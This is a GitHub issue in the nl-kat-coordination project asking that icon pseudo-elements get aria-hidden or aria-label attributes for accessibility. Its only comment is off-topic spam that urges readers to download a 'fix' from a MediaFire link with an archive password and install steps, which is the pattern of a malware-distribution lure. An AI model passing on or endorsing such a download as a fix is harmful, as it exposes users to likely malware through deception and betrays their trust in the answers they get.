### ISSUE TITLE
Add correct aria-label on icons.

### ISSUE THREAD

**Issue by HeleenSG** [minvws/nl-kat-coordination#3404]
_Please add `bug`, the name of any relevant modules (e.g. `rocky`), and any other relevant labels to your issue._

**Describe the bug**

Where we use icons as pseudo-content (with icon font and a ::before or ::after). They should either get an aria-label or aria-hidden="true" - most likely the latter since the links already have accessible text. This should be checked and added where needed.

**To Reproduce**
Check where icons are used (class="icon ...")

**Expected behavior**
Either add an aria-label or aria-hidden="true" - most likely the latter since the links already have accessible text. To be accessible.

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
